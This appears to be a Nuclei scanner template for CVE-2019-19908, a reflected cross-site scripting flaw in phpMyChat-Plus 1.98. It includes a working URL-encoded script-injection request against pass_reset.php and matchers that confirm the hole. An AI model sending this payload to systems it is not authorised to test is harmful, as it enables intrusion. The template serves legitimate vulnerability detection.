nuclei-templates/cves/2019/CVE-2019-19908.yaml

32 lines
996 B
YAML

id: CVE-2019-19908
info:
name: phpMyChat-Plus - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body